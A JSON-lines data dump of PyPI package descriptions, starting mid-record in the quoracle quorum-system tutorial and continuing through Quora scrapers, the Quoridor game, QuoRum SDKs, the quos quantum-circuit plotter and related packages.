this\ndistribution.>>>distribution={0.1:1,0.75:1}>>>strategy=grid.strategy(read_fraction=distribution)>>>strategy.load(read_fraction=distribution)0.40416666474999996Heterogeneous NodeIn the real world, not all nodes are equal. We often run distributed systems on\nheterogeneous hardware, so some nodes might be faster than others. To model\nthis, we instantiate every node with its capacity. Here, nodesa,c, andecan process 1000 commands per second, while nodesb,d, andfcan\nonly process 500 requests per second.>>>a=Node('a',capacity=1000)>>>b=Node('b',capacity=500)>>>c=Node('c',capacity=1000)>>>d=Node('d',capacity=500)>>>e=Node('e',capacity=1000)>>>f=Node('f',capacity=500)Now, the definition of capacity becomes much simpler. The capacity of a quorum\nsystem is simply the maximum throughput that it can achieve. The load can be\ninterpreted as the inverse of the capacity. Here, our quorum system is capable\nof processing 1333 commands per second for a workload of 75% reads.>>>grid=QuorumSystem(reads=a*b*c+d*e*f)>>>strategy=grid.strategy(read_fraction=0.75)>>>strategy.load(read_fraction=0.75)0.00075>>>strategy.capacity(read_fraction=0.75)1333.3333333333333Nodes might also process reads and writes at different speeds. We can specify\nthe peak read and write throughput of every node separately. Here, we assume\nreads are ten times as fast as writes.>>>a=Node('a',write_capacity=1000,read_capacity=10000)>>>b=Node('b',write_capacity=500,read_capacity=5000)>>>c=Node('c',write_capacity=1000,read_capacity=10000)>>>d=Node('d',write_capacity=500,read_capacity=5000)>>>e=Node('e',write_capacity=1000,read_capacity=10000)>>>f=Node('f',write_capacity=500,read_capacity=5000)With 100% reads, our quorum system can process 10,000 commands per second.\nThis throughput decreases as we increase the fraction of writes.>>>grid=QuorumSystem(reads=a*b*c+d*e*f)>>>grid.capacity(read_fraction=1)10000.0>>>grid.capacity(read_fraction=0.5)3913.043450018904>>>grid.capacity(read_fraction=0)2000.0f-resilient StrategiesAnother real world complication is the fact that machines sometimes fail and\nare sometimes slow. If we contact a quorum of nodes, some of them may fail, and\nwe'll get stuck waiting to hear back from them. Or, some of them may be\nstragglers, and we'll wait longer than we'd like. We can address this problem\nby contacting more than the bare minimum number of nodes.Formally, we say a read quorum (or write quorum) q isf-resilientif\ndespite the failure of anyfnodes, q still forms a read quorum (or write\nquorum). A strategy isf-resilient if it only selectsf-resilient quorums.\nBy default,strategyreturns0-resilient quorums. We can pass in thefargument to get more resilient strategies.>>>strategy=grid.strategy(read_fraction=0.5,f=1)These sets are quorums even if 1 machine fails.>>>strategy.get_read_quorum(){'b','f','e','d','a','c'}>>>strategy.get_write_quorum(){'b','d','a','e'}Note that as we increase resilience, quorums get larger, and we decrease\ncapacity. On a 100% write workload, our grid quorum system has a 0-resilient\ncapacity of 2000 commands per second, but a 1-resilient capacity of 1000\ncommands per second.>>>grid.capacity(write_fraction=1,f=0)2000.0>>>grid.capacity(write_fraction=1,f=1)1000.0Also note that not all quorum systems are equally as resilient. In the next\ncode snippet, we construct a \"write 2, read 3\" quorum system using thechoosefunction. For this quorum system, every set of 2 nodes is a write quorum, and\nevery set of 3 nodes is a read quorum. This quorum system has a 0-resilient\ncapacity of 2000 (the same as the grid), but a 1-resilient capacity of 1333\n(higher than the grid).>>>write2=QuorumSystem(writes=choose(2,[a,b,c,d,e]))>>>write2.capacity(write_fraction=1,f=0)2000.0>>>write2.capacity(write_fraction=1,f=1)1333.3333333333333LatencyIn the real world, not all nodes are equally as far away. Some are close and\nsome are far. To address this, we associate every node with a latency, i.e. the\ntime the required to contact the node. We model this in quoracle by assigning\neach node a latency, represented as adatetime.timedelta. Here, nodesa,b,c,d,e, andfin our grid have latencies of 1, 2, 3, 4, 5, and 6\nseconds.>>>importdatetime>>>>>>defseconds(x:int)->datetime.timedelta:>>>returndatetime.timedelta(seconds=x)>>>>>>a=Node('a',write_capacity=1000,read_capacity=10000,latency=seconds(1))>>>b=Node('b',write_capacity=500,read_capacity=5000,latency=seconds(2))>>>c=Node('c',write_capacity=1000,read_capacity=10000,latency=seconds(3))>>>d=Node('d',write_capacity=500,read_capacity=5000,latency=seconds(4))>>>e=Node('e',write_capacity=1000,read_capacity=10000,latency=seconds(5))>>>f=Node('f',write_capacity=500,read_capacity=5000,latency=seconds(6))>>>grid=QuorumSystem(reads=a*b*c+d*e*f)Thelatency of a quorumqis the time required to form a quorum of\nresponses after contacting every node inq. For example, the read quorum{a, b, c}has a latency of three seconds. It takes 1 second to hear back froma,\nanother second to hear back fromb, and then a final second to hear back fromc. The write quorum{a, b, d, f}has a latency of 4 seconds. It takes 1\nsecond to hear back froma, another second to hear back fromb, and then\nanother 2 seconds to hear back fromd. The set{a, b, d}is a write quorum,\nso the latency of this quorum is 4 seconds. Note that we didn't have to wait to\nhear back fromfin order to form a quorum.Thelatency of a strategyis the expected latency of the quorums that it\nchooses. Thelatency of a quorum systemis the latency of the latency-optimal\nstrategy. We can use thestrategyfunction to find a latency-optimal strategy\nby passing in the value\"latency\"to theoptimizeflag.>>>sigma=grid.strategy(read_fraction=0.5,optimize='latency')>>>sigmaStrategy(reads={('a','b','c'):1.0},writes={('c','d'):1.0})We can find the latency of this strategy by calling thelatencyfunction.>>>sigma.latency(read_fraction=1)0:00:03>>>sigma.latency(read_fraction=0)0:00:04>>>sigma.latency(read_fraction=0.5)0:00:03.500000As with capacity, we can call thelatencyfunction on our quorum system\ndirectly. In the follow code snippetgrid.latency(read_fraction=0.5, optimize='latency')is a shorthand forgrid.strategy(read_fraction=0.5, optimize='latency').latency(read_fraction=0.5).>>> grid.latency(read_fraction=0.5, optimize='latency')\n0:00:03.500000Note that finding the latency-optimal strategy is trivial. The latency-optimal\nstrategy always selects the read and write quorum with the smallest latencies.\nHowever, things get complicated when we start optimizing for capacity and\nlatency at the same time. When we call thestrategyfunction withoptimize='latency', we can pass in a constraint on the maximum allowable load\nusing theload_limitargument. For example, in the code snippet below, we\nfind the latency-optimal strategy with a capacity of at least 1,500.>>>sigma=grid.strategy(read_fraction=0.5,...optimize='latency',...load_limit=1/1500)>>>sigmaStrategy(reads={('a','b','c'):1.0},writes={('a','d'):0.66666667,('c','e'):0.33333333})>>>sigma.capacity(read_fraction=0.5)1499.9999925>>>sigma.latency(read_fraction=0.5)0:00:03.666667This strategy always picks the read quorum{a, b, c}, and picks the write\nquorum{a, d}twice as often as write quorum{c, e}. It achieves our\ndesired capacity of 1,500 commands per second (ignoring rounding errors) and\nhas a latency of 3.66 seconds. We can also find a load-optimal strategy with a\nlatency constraint.>>>sigma=grid.strategy(read_fraction=0.5,...optimize='load',...latency_limit=seconds(4))>>>sigmaStrategy(reads={('a','b','c'):0.98870056,('d','e','f'):0.011299435},writes={('a','d'):0.19548023,('a','f'):0.22429379,('b','d'):0.062711864,('b','e'):0.097740113,('c','e'):0.41977401})>>>sigma.capacity(read_fraction=0.5)3856.2090893331633>>>sigma.latency(read_fraction=0.5)0:00:04.000001This strategy is rather complicated and would be hard to find by hand. It has a\ncapacity of 3856 commands per second and achieves our latency constraint of 4\nseconds.Be careful when specifying constraints. If the constraints cannot be met, aNoStrategyFoundexception is raised.>>>grid.strategy(read_fraction=0.5,...optimize='load',...latency_limit=seconds(1))Traceback(mostrecentcalllast):...quoracle.quorum_system.NoStrategyFoundError:nostrategysatisfiesthegivenconstraintsNetwork LoadAnother useful metric is network load. When a protocol performs a read, it has\nto send messages to every node in a read quorum, and when a protocol performs a\nwrite, it has to send messages to every node in a write quorum. The bigger the\nquorums, the more messages are sent over the network. Thenetwork load of a\nquorumis simply the size of the quorum, thenetwork load of a strategyis\nthe expected network load of the quorums it chooses, and thenetwork load of a\nquorum systemis the network load of the network load-optimal strategy.We can find network load optimal-strategies using thestrategyfunction by\npassing in\"network\"to theoptimizeflag. We can also specify constraints\non load and latency. In general, using thestrategyfunction, we can pick one\nof load, latency, or network load to optimize and specify constraints on the\nother two metrics.>>>sigma=grid.strategy(read_fraction=0.5,optimize='network')>>>sigmaStrategy(reads={('a','b','c'):1.0},writes={('c','f'):1.0})>>>sigma.network_load(read_fraction=0.5)2.5>>>grid.network_load(read_fraction=0.5,optimize='network')2.5>>>sigma=grid.strategy(read_fraction=0.5,...optimize='network',...load_limit=1/2000,...latency_limit=seconds(4))SearchFinding good quorum systems by hand is hard. quoracle includes a heuristic\nbased search procedure that tries to find quorum systems that are optimal with\nrespect a target metric and set of constraints. For example, lets try to find a\nquorum systemthat has resilience 1,that is 1-resilient load optimal for a 75% read workload,that has a latency of most 4 seconds, andthat has a network load of at most 4.Because the number of quorum systems is enormous, the search procedure can take\na very, very long time. We pass in a timeout to the search procedure to limit\nhow long it takes. If the timeout expires,searchreturns the most optimal\nquorum system that it found so far.### Search>>>qs,sigma=search(nodes=[a,b,c,d,e,f],...resilience=1,...f=1,...read_fraction=0.75,...optimize='load',...latency_limit=seconds(4),...network_limit=4,...timeout=seconds(60))>>>qsQuorumSystem(reads=choose3(a,c,e,(b+d+f)),writes=choose2(a,c,e,(b*d*f)))>>>sigmaStrategy(reads={('a','c','e','f'):0.33333333,('a','b','c','e'):0.33333333,('a','c','d','e'):0.33333333},writes={('a','b','c','d','f'):0.15714286,('b','c','d','e','f'):0.15714286,('a','c','e'):0.52857143,('a','b','d','e','f'):0.15714286})>>>sigma.capacity(read_fraction=0.75)3499.9999536250007>>>sigma.latency(read_fraction=0.75)0:00:03.907143>>>sigma.network_load(read_fraction=0.75)3.9857142674999997Here, the search procedure returns the quorum systemchoose(3, [a, c, e, b+d+f])with a capacity of 3500 commands per second and with latency and\nnetwork load close to the limits specified.Publishing To pypiFirst, bump the version insetup.py. Then, run the following where $VERSION\nis the current version insetup.py.python -m unittest\npython -m build\npython -m twine upload dist/quoracle-$VERSION*"} +{"package": "quora-profile-search", "pacakge-description": "No description available on PyPI."} +{"package": "quorapy", "pacakge-description": "quorapy.. image::https://travis-ci.org/djunehor/quorapy.svg?branch=master:target:https://travis-ci.org/djunehor/quorapy:alt: Build Status.. image::http://hits.dwyl.io/djunehor/quorapy.svg:target:http://hits.dwyl.io/djunehor/quorapy:alt: HitCountIssues and pull requests welcome.A Python module to fetch and parse data from Quora.\n\nTable of Contents\n^^^^^^^^^^^^^^^^^\n\n\n* `Installation <#installation>`_\n* `Usage <#usage>`_\n* `Features <#features>`_\n* `Contribute <#contribute>`_\n\nInstallation\n------------\n\nYou will need `Python 3.x `_ and `pip `_.\n\nInstall using pip: ``pip install quorapy``\nInstall via repo:\n\n\n* Clone repor ``git clone https://github.com/djunehor/quorapy``\n* Install requirements via ``pip install -r requirements.txt``\n* Place quorapy in your project root folder\n\nUsage\n-----\n\n.. code-block:: python\n\n from quorapy import Quora\n import os\n from quorapy.browser import Browser\n\n browser = Browser(os.getenv('LINUX'))\n quora = Quora(browser)\n\n # search for `Python`\n results = quora.search('Python')\n\n # Sample response:\n { \"answer_limit\": 1,\n \"data\": [\n {\n \"comments\": [\n {\n \"text\": \"Rather than giving you a boring step by step process of learning Python, I would share my personal journey about how I started learning Python.\\nHere is my personal learning experience:\\nWhat motivated me to start learn Python ?\\nI fell in love with Python after reading a bunch of answers on Quora about how people were doing wonderful things with Python.\\nSome were writing scripts to automate their Whats app messages.\\nSome wrote a script to download their favourite songs,\\nwhile some built a system to receive cricket score updates on their phones.\\nAll of this seemed very excited to me and I finally dec...(more)\",\n \"user\": {\n \"datetime\": \"2019-09-29 02:52:30.692237\",\n \"name\": \"\",\n \"url\": \"https://www.quora.com/profile/Neha-Ahuja-178\"\n }\n }\n ],\n \"question\": {\n \"datetime\": \"2019-09-28 23:57:00\",\n \"text\": \"How should I start learning Python?\",\n \"user\": {\n \"name\": \"Quora Content Review\",\n \"url\": \"https://quora.com/profile/Quora-Content-Review\"\n }\n },\n \"url\": \"https://www.quora.com/How-should-I-start-learning-Python-1\"\n }\n ],\n \"load_user\": null,\n \"query\": \"python\",\n \"question_limit\": 1\n }\n\nFeatures\n--------\n\nCurrently implemented\n^^^^^^^^^^^^^^^^^^^^^\n\n\n* Search\n\nContribute\n----------\n\nCheck out the issues on GitHub and/or make a pull request to contribute!"} +{"package": "quoras", "pacakge-description": "quorasA Python package to collect data from Quora.InstallationThe package is available on PyPI. Simply run the following command:pip install quorasSetupCreate a folder calledchrome_pathin the same directory as your source file. Download the ChromeDriver fromhereand place thechromedriver.exefile in the newly created folder.InitializeYou need to have account on Quora (or its language-specific forum) to collect data from it. Initialize the Quora class as following providing your credentials and language code. The language codes can be foundhere.quora = Quora ('email-address', 'password', 'language-code')UsageThis package allows you to call several functions. Search with keywords for questions, topics or users with functionsearch(keyword, type='post', scroll_count=1). Changetypeto'topic'or'user'to search topic RSS pages or user profiles respectively. You can pass a value forscroll_countto control how many scrolls the web browser will automatically do.posts = quora.search('ancient history', 'post', scroll_count=1)\ntopics = quora.search('finance', 'topic', scroll_count=1)\nusers = quora.search('Dipto Das', 'user', scroll_count=1)There are alternative ways to search posts or users. You can callsearch_posts(keyword, scroll_count=1)function that searches for posts with specified keyword without requiring explicitly indicating type. Similarly,search_users(keyword, scroll_count=1)function to search users containing keyword in their profile names. You can also pass a value forscroll_countto control how many scrolls the web browser will automatically do.questions = quora.search_posts('ancient history', scroll_count=1)\nusers = quora.search_users('Dipto Das', scroll_count=1)To search for Q/A threads with a specific user-assigned topic tag, you can simply callsearch_topic(topic, scroll_count=1)function as follows:topic_questions = search_topic('politics', scroll_count=5)If you already have an url, you can directly search details about that entry. If it is an url to a Q/A thread, then it will return the question, topics, answers, participating users, and Quora suggested related questions. If it is an url to a user profile, then it will return statistics about the user (e.g., number of public answers, number of questions, number of shares, number of posts, number of followings, and number of followers), and links to top (defined by Quora) posts from the user. To use this function, you have to callsearch_url(url)function.qathread_details = quora.search_url('https://bn.quora.com/\u0986\u09b8\u09be\u09ae\u0995\u09c7-\u0995\u09c7\u09a8-\u09b8\u09ac\u09be\u0987-\u0985\u09b8\u09ae-\u09ac\u09b2\u099b\u09c7')\nuser_details = quora.search_url('https://www.quora.com/profile/Dipto-Das-1')Importantly, quoras can can retrieve the full text in an answer given its url. For that, you need to callget_full_answer(url)function as following:full_answer = quora.get_full_answer('https://bn.quora.com/\u09ac\u09bf\u099c\u09cd\u099e\u09be\u09a8\u09c0\u09a6\u09c7\u09b0-\u09ae\u09a7\u09cd\u09af\u09c7\u0993-\u0995\u09bf/answers/150612153')"} +{"package": "quora-scraper", "pacakge-description": "Quora-scraperQuora-scraper is a command-line application written in Python that scrapes Quora. It simulates a browser environment to let you scrape Quora rich textual data. You can use one of the three scraping modules to: Find questions that discuss about certain topics (such as Finance, Politics, Tesla or Donald-Trump). Scrape Quora answers related to certain questions, or scrape users profile. Please use it responsibly !InstallTo use our scraper, please follow the steps below:Install python 3.6 or upper versions.Install the latest version of google-chrome.Download chromedriver and add it to your sys path:https://sites.google.com/a/chromium.org/chromedriver/homeInstall quora-scraper:$pipinstallquora-scraperTo update quora-scraper:$pipinstallquora-scraper--upgradeAlternatively, you can clone the project and run the following command to install: Make sure you cd into the quora-scraper folder before performing the command below.$pythonsetup.pyinstallUsagequora-scraper has three scraping modules :questions,answers,users.1) Scraping questions URL:You can scrape questions related to certain topics usingquestionscommand. This module takes as an input a list of topic keywords. Output is a questions_URL file containing the topic's question links.Scraping a topic questions can be done as follows:a) Use -l parameter + topic keywords list.$quora-scraperquestions-l[finance,politics,Donald-Trump]b) Use -f parameter + topic keywords file location. (keywords must be line separated inside the file):$quora-scraperquestions-ftopics_file.txt2) Scraping answers:Quora answers are scraped usinganswerscommand. This module takes as an input a list of Questions URL. Output is a file of scraped answers (answers.txt). An answer consists of :Quest-ID | AnswerDate | AnswerAuthor-ID | Quest-tags | Answer-TextTo scrape answers, use one of the following methods:a) Use -l parameter + question URLs list.$quora-scraperanswers-l[https://www.quora.com/Is-milk-good,https://www.quora.com/Was-Einstein-a-fake-and-a-plagiarist]b) Use -f parameter + question URLs file location:$quora-scraperanswers-fquestions_url.txt3) Scraping Quora user profile:You can scrape Quora Users profile usinguserscommand. The users module takes as an input a list of Quora user IDs. The output is UserProfile file containing:First line :\nUserID | ProfileDescription |ProfileBio | Location | TotalViews |NBAnswers | NBQuestions | NBFollowers | NBFollowingRemaining lines (User's answers):\nAnswerDate | QuestionID | AnswerTextScraping Users profile can be done as follows:a) Use -l parameter + User-IDs list.$quora-scraperusers-l[Albert-Einstein-195,Jackie-Chan-8]b) Use -f parameter + User-IDs file.$quora-scraperusers-fquora_username_file.txtNotesa) Input files must be line separated.b) Output files fields are tab separated.c) You can add a list/line index parameter In order to start the scraping from that index. The code below will start scraping from \"physics\" keyword:sh $ quora-scraper questions -l [finance,politics,tech,physics,life,sports] -i 3d) Quora website puts limit on the number of questions accessible on a topic page. Thus, even if a topic has a large number of questions (ex: 100k), the number scraped questions links will not exceed 2k or 3k questions.e) For more help use :$quora-scraper--helpf) Quora-scraper uses xpaths and bs4 methods to scrape Quora webpage elements. Since Quora HTML Structure is constantly changing, the code may need modification from time to time. Please feel free to update and contribute to the source-code in order to keep the scraper up-to-date.LicenseThis project uses the following license:MIT"} +{"package": "quoridor", "pacakge-description": "Quoridor OnlineClient and server to play the strategy board gameQuoridor. It usespygame.InstallRequires: Python >=3.6.\nTo install, open a command prompt and launch:pip3installquoridorUseTo launch a server:python3-mquoridor.server[HOST][PORT][NUM_PLAYERS]HOST: IP addressPORT: port numberNUM_PLAYERS: number of players (2, 3 or 4)To launch a client:python3-mquoridor.client[HOST][PORT]HOST and PORT must be the same as the server.PlayYou can see the rules of the gamehere:To move your pawn, use the four arrow keysTo place a fence, click on the game boardAt the end of the game, you can restart a game. Just click on the \"Restart\" button.Pathfinding algorithmA pathfinding algorithm is used to check if a player is blocked or not. Thanks to thepython-pathfindingproject.ContactQuentin Deschamps:quentindeschamps18@gmail.comLicenseMIT"} +{"package": "quorra", "pacakge-description": "A python wrapper aroundquorra.js, for creating reusable visualizations.InstallationCurrently, the best way to install this repository is directly from the source:gitclonehttp://github.com/bprinty/quorra-python.gitcdquorra-pythonpythonsetup.pyinstallUsageComing soon \u2026In the meantime, here\u2019s a snippit of how to generate a toy plot:>>>importquorra>>>importpandas>>>importrandom>>>data=pandas.DataFrame({>>>'x':[iforiinrange(0,10)],>>>'y':[round(random.gauss(100,10),2)foriinrange(0,10)],>>>'group':['data']*10>>>})>>>plt=quorra.line().data(>>>data,>>>x='x',>>>y='y',>>>group='group'>>>).xlabel('Index').ylabel('Random Value')>>>quorra.render(plt)Questions/FeedbackFile an issue in theGitHub issue tracker."} +{"package": "quorum", "pacakge-description": "A small extension framework for Flask to easy a series of simple tasks.Usageimportflaskimportquorumapp=quorum.load(name=__name__)@app.route(\"/\",methods=(\"GET\",))defindex():returnflask.render_template(\"index.html.tpl\")if__name__==\"__main__\":quorum.run()Creation of background callables, that will execute every one second in a separate thread@quorum.background(timeout=1.0)defhello_recursive():print(\"hello word\")Buildingsphinx-build-bhtmldocdoc/_buildDocumentationExtra documentation is available under our readthedocs.compage. Keep\nin mind that some delay may exist between the current repositorymasterversion and the documentation.We need people to help documentation the code base if you know anyone please contact us.Build Automation"} +{"package": "quorum-data-py", "pacakge-description": "Python Data for Apps of QuoRumquorum \u5e38\u7528\u6570\u636e\u7ed3\u6784\u7684 python \u5c01\u88c5\uff1a1\u3001feed\uff1a\u57fa\u4e8e quorum \u65b0\u5171\u8bc6\uff0c\u76ee\u524d\u88ab rum app\u3001feed\u3001port\u3001circle \u7b49\u51e0\u6b3e\u4ea7\u54c1\u91c7\u7528\u7684\u6570\u636e\u7ed3\u6784\u53c2\u8003\uff1ahttps://docs.rumsystem.net/docs/data-format-and-examples\u8bf7\u7559\u610f\uff0c\u8fd9\u53ea\u662f\u63a8\u8350\u7ed3\u6784\uff0c\u5e76\u4e0d\u662f\u552f\u4e00\u6807\u51c6\u3002quorum chain \u662f\u975e\u5e38\u5f00\u653e\u7684\uff0c\u5ba2\u6237\u7aef\u5b8c\u5168\u53ef\u4ee5\u6309\u7167\u81ea\u5df1\u7684\u9700\u6c42\u6765\u6784\u9020\u4e0a\u94fe\u6570\u636e\u7684\u7ed3\u6784\u30022\u3001converter\uff1a\u57fa\u4e8e quorum \u65b0\u5171\u8bc6\uff0c\u4ece\u65e7\u94fe trx \u6216\u4ece \u65b0\u94fe trx \u8f6c\u6362\u4e3a\u5f85\u53d1\u5e03\u7684\u6570\u636e\u3002\u76ee\u524d\u4e3b\u8981\u7528\u4f5c\u6570\u636e\u8fc1\u79fb\uff1a\u4ece\u65e7\u5171\u8bc6\u94fe\u8fc1\u79fb\u5230\u65b0\u5171\u8bc6\u94fe\uff1b\u5728\u65b0\u5171\u8bc6\u94fe\u4e4b\u95f4\u8fc1\u79fb\u30023\u3001trx_type\uff1a\u5224\u65ad trx \u7684\u7c7b\u578b\u3002\u8be5\u65b9\u6cd5\u6240\u8fd4\u56de\u7684\u7ed3\u679c\uff0c\u4e0e rum-app\uff0cfeed \u7b49\u4ea7\u54c1\u7684\u5904\u7406\u4fdd\u6301\u4e00\u81f4\u3002Installpipinstallquorum_data_pyExamplesfromquorum_data_pyimportfeed# create a new post datadata=feed.new_post(content='hello guys')# create a like post datadata=feed.like('a-post-id')\u9002\u7528\u4e8e fullnode \u4e5f\u9002\u7528\u4e8e lightnode\uff0c\u6bd4\u5982\uff1afromquorum_data_pyimportfeedfromquorum_fullnode_pyimportFullNodejwt=\"xxx\"url=\"xxx\"fullnode=FullNode(url,jwt)data=feed.new_post(content='hello guys')fullnode.api.post_content(data)fromquorum_data_pyimportfeedfromquorum_mininode_pyimportMiniNodeseed=\"xxx\"mininode=MiniNode(seed)data=feed.new_post(content='hello guys')mininode.api.post_content(data)Sourcequorum fullnode sdk for python:https://github.com/liujuanjuan1984/quorum-fullnode-pyquorum mininode sdk for python:https://github.com/liujuanjuan1984/quorum-mininode-pyand more ...https://github.com/okdaodine/awesome-quorumLicenseThis work is released under theMITlicense. A copy of the license is provided in theLICENSEfile."} +{"package": "quorum-eth-py", "pacakge-description": "quorum-eth-pythe eth blockchain of rum network"} +{"package": "quorum-fullnode-py", "pacakge-description": "quorum_fullnode_pyPython SDK for Quorum FullNode.More about QuoRum:https://rumsystem.net/https://github.com/rumsystem/quorumInstallpipinstallquorum_fullnode_pyUsagefromquorum_fullnode_pyimportFullNodeurl=\"http://127.0.0.1:11002\"jwt=\"eyJhbGciO...VCJ9.eyJhbGxvd0...pbiJ9.FeyMWvzweE...o66QZ735nsrU\"# connect to a quorum fullnode with api url and chain jwt_tokenclient=FullNode(api_base=url,jwt_token=jwt)# check node_status is online.client.api.node_info().get(\"node_status\")==\"NODE_ONLINE\"# create a group chain for testinfo=client.api.create_group(\"test_group\")client.group_id=info[\"group_id\"]# send a new post to the group chaindata={\"type\":\"Create\",\"object\":{\"type\":\"Note\",\"content\":\"nice to meet u!\",\"name\":\"hi\",\"id\":\"efb14f14-f849-4cf3-bcb6-c3598e857adb\",},}resp=client.api.post_content(data)# get trx from group chaintrx=client.api.trx(resp['trx_id'])# get content:trxs=client.api.get_content()Sourcequorum fullnode sdk for python:https://github.com/liujuanjuan1984/quorum-fullnode-pyquorum mininode sdk for python:https://github.com/liujuanjuan1984/quorum-mininode-pyand more ...https://github.com/okdaodine/awesome-quorumLicenseThis work is released under theMITlicense. A copy of the license is provided in theLICENSEfile."} +{"package": "quorum-lightnode", "pacakge-description": "quorum lightnode for Pythoninstallpipinstall-Uquorum-lightnodeuse quorum-lightnodejoin group and get group seed from localexportPYTHONPATH=.\npythonexample/join_group.pysend postexportPYTHONPATH=.\npythonexample/send_post.py"} +{"package": "quorum-mininode-py", "pacakge-description": "QuoRum LightNode Python SDKPython SDK for Quorum LightNode, Without local storage.Another better choice isquorum-lightnode-py, with local storage.More about QuoRum:https://rumsystem.net/https://github.com/rumsystem/quorumInstallpipinstallquorum_mininode_pyUsagefromquorum_mininode_pyimportMiniNodeseed_url='rum://seed?v=1&e=0&n=0&c=apzmbMVtMy6J0sQKwhF...2MwHjpA2E'pvtkey=\"0xd4e9ddc19ec5b...d8c\"bot=MiniNode(seed_url,pvtkey)# post content to rum group chaindata={\"type\":\"Create\",\"object\":{\"type\":\"Note\",\"content\":\"Hello world! Hello quorum!\",\"id\":\"a1d92233-3801-4295-a3cd-0e594385acc6\",},}resp=bot.api.post_content(data)print(resp)# like a postdata={\"type\":\"Like\",\"object\":{\"type\":\"Note\",\"id\":\"a1d92233-3801-4295-a3cd-0e594385acc6\"},}resp=bot.api.post_content(data)print(resp)# get content from rum group chaintrxs=bot.api.get_content(num=2,reverse=True)print(trxs)Sourcequorum fullnode sdk for python:https://github.com/liujuanjuan1984/quorum-fullnode-pyquorum data module for python:https://github.com/liujuanjuan1984/quorum-data-pyand more..https://github.com/okdaodine/awesome-quorumLicenseThis work is released under theMITlicense. A copy of the license is provided in theLICENSEfile."} +{"package": "quorumtoolbox", "pacakge-description": "# Quorum Toolbox[![CircleCI](https://circleci.com/gh/chainstack/quorum-toolbox/tree/master.svg?style=svg&circle-token=c64e8d715eee5747f4ab9f9e0321dc558f3ec92f)](https://circleci.com/gh/chainstack/quorum-toolbox/tree/master)\n[![PyPI version](https://badge.fury.io/py/quorumtoolbox.svg)](https://badge.fury.io/py/quorumtoolbox)## DependenciesPython ^3.4[constellation v0.3.2](https://github.com/jpmorganchase/constellation) (constellation-node)[quorum v2.6.0](https://github.com/jpmorganchase/quorum) (geth,bootnode)[istanbul-tools v1.0.1](https://github.com/jpmorganchase/istanbul-tools) (istanbul)## Installationpip install quorumtoolbox## DevelopmentClone repo, cd to quorum-toolbox and runpython setup.py develop.## Testingdocker-compose up"} +{"package": "quos", "pacakge-description": "Quos packageQuos package simplifies plotting and simulating a quantum computing circuit employing oscillatory qubits.To installpip install matplotlib\npip install pandas\npip install quosTo upgradepip install --upgrade quosRequired packagesmatplotlibpandasIncluded def functions ininit.py filePrimary (most usable) functionsqg(ssgqt): To create a plot of a quantum circuit based on a stringqb(ssgqt): To simulate a quantum circuit and plot Bloch spheres based on a stringSecondary (occasionally usable) functionsqh(): To show html file of list of quantum gates included hereqx(): To download quos.xlsm and qblo.xlsm filesqs(xlsm='quos.xlsm', wsht='Gates'): To generate a string for a quantum circuitHelper (internally used) functionsqn(nstr, tint=True): To create a number-type string into an integer or a floatqa(sn0r, sn0i, sn1r, sn1i): To convert qubit state numbers into qubit state anglesqp(sn0r, sn0i, sn1r, sn1i): To convert qubit state numbers into qubit state probabilitiesqm(xS, sn0r, sn0i, sn1r, sn1i): To multiply a matrix and a vector to generate a vectorIncluded gates in plots and simulationsQubits0: qubit in state 01: Qubit in state 1Q: Qubit in an arbitrary state specified by two angle argumentsIndividual gates without any argumentI: IdentityH: HadamardX: (Pauli) X gateY: (Pauli) Y gateZ: (Pauli) Z gateS: S (sqrt Z) phaseT: T (Pi/8 phase gate)V: V (sqrt X) phaseIndividual gates with one angle argumentRx: Rotation around XRy: Rotation around YRz: Rotation around ZPh: Global phase gatePp: Phase gate for second stateIndividual gates with three angle argumentsU: Universal rotation around arbitrary axisInteractive gatesC: Controls another gate: Needs affected gateCd: Reverse-controls another gate: Needs affected gateSw: Swaps with another gate: Needs connected SwiSw: Imaginary swaps with another gate: Needs connected iSwMeasurement related gatesM: Measurement gateThese gates can work for qudits after some modifications.Example string to represemt a quantum circuittxt = '1,3,0|Q 30 60,5,0|H,a,1|Y,1,2|Z,2,2|X,3,2|Y,4,2|Z,5,2|X,6,2|S,2,3|T,4,3|V,6,3|'\ntxt = txt + 'Rx 30,1,4|Ry 15,2,4|Rz 15,3,4|Rz 30,4,4|Ry 15,5,4|Rx 15,6,4|'\ntxt = txt + 'Ph 15,2,5|Pp 30,4,5|C,2,6,C,5,6,X,3,6|Cd,1,7,Ph 15,2,7|U 30 30 15,4,7|'\ntxt = txt + 'U 15 15 30,6,7|C,1,8,X,2,8|Sw,4,8,Sw,6,8|iSw,3,9,iSw,4,9|M,a,10'1 (qubit 1) on qubit 3 at time 0Q 30 60 (qubit with angles 30 60) on qubit 5 at time 00 (qubit 0) on other qubits at time 0H (Hadamard gate) on all qubits at time 1Y (Pauli Y gate) on qubit 1 at time 2 ...S (S gate) on qubit 2 at time 3 ...Rx 30 (rotation by 30 around X) on qubit 1 at time 4 ...Ph 15 (global phase gate by 15) on qubit 2 at time 5Pp 30 (phase gate for second state by 30) on qubit 4 at time 5C (control points) on qubits 2 and 5 at time 6 controlling X on qubit 3Cd (reverse control point) on qubit 1 at time 7 controlling Ph 15 on qubit 2U 30 30 15 (rotation by 30 30 15 around X Y Z) on qubit 4 at time 7 ...C (control point) on qubit 1 at time 8 controlling X on qubit 2Sw (swap) on qubits 4 and 6 at time 8iSw (imaginary swap) on qubits 3 and 4 at time 9M (measurement gate) on all qubits at time 10Example codes using this packageimport quos\n\n# To show html file of list of quantum gates included here\nquos.qh()\n# To download quos.xlsm and qblo.xlsm files\nquos.qx()\n# To generate a string for a quantum circuit\ntxt = quos.qs(xlsm=, wsht=)\n\n# To create a plot of a quantum circuit based on a string\nqg(txt)\n\n#To simulate a quantum circuit and plot Bloch spheres based on a string\nqb(ssgqt):Version History0.0.1 2023-11-07 Initial release0.0.2 2023-11-07 Minor corrections0.0.3 2023-11-07 Minor corrections0.0.4 2023-11-07 Minor corrections0.0.5 2023-11-09 Removed dependancy on networkx package0.0.6 2023-11-09 Enabled plotting of CNOT gate0.0.7 2023-11-10 Enabled arguments and plotting of qubits0.0.8 2023-11-14 Enabled several other gates0.0.9 2023-11-15 Enabled measurement gates0.0.10 2023-11-16 Enabled Excel file output0.0.11 2023-11-20 Enabled simulation in Excel file0.0.12 2023-11-29 Enabled simulation and Bloch spheres0.0.13 2023-12-02 Improved simulation and Bloch spheres0.0.14 2023-12-05 Improved simulation and Excel files0.0.15 2023-12-06 Enabled Toffoli gates0.0.16 2023-12-11 Improved Bloch sphere representations"} +{"package": "quotachecker", "pacakge-description": "This program returns the quota of 1st level sub directories 